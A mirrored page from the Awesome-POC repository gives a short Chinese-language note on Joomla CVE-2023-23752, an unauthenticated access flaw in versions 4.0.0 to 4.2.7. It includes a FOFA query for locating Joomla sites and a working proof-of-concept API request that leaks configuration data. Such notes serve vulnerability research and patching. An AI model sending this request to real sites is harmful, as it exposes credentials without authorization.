admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Joomla application 未授权访问漏洞 CVE-2023-23752.md
Threekiii cfe90fbed7 更新漏洞
2023-03-14 09:11:27 +08:00

499 B
Raw Blame History

Joomla application 未授权访问漏洞 CVE-2023-23752

漏洞描述

Joomla 存在未授权访问漏洞,攻击者通过覆盖 public 值绕过限制访问部分API获取敏感数据

漏洞影响

Joomla 4.0.0 - 4.2.7

FOFA

app="Joomla"

漏洞复现

登陆页面

image-20230313171122485

验证POC

/api/index.php/v1/config/application?public=true

image-20230313171136037